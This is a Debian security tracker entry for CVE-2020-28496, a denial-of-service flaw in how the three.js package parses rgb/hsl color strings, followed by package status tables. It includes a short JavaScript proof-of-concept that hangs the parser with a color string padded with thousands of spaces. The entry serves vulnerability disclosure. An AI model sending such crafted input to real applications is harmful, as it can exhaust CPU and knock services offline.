| Name | CVE-2020-28496 |
| Description | This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += " " } return ret + ""; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+" ms") |
| Source | CVE (at NVD; CERT, LWN, oss-sec, fulldisc, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, GitHub advisories/code/issues, web search, more) |
Vulnerable and fixed packages
The table below lists information on source packages.
| Source Package | Release | Version | Status |
|---|
| three.js (PTS) | buster | 80+dfsg2-2 | fixed |
| bullseye | 111+dfsg1-2 | fixed |
| bookworm, sid, trixie | 111+dfsg1-3 | fixed |
The information below is based on the following data on fixed versions.
| Package | Type | Release | Fixed Version | Urgency | Origin | Debian Bugs |
|---|
| three.js | source | (unstable) | (not affected) | | | |
Notes
- three.js <not-affected> (Vulnerable code introduced later, #988726)
https://github.com/mrdoob/three.js/pull/21143/commits/4a582355216b620176a291ff319d740e619d583e
https://github.com/mrdoob/three.js/issues/21132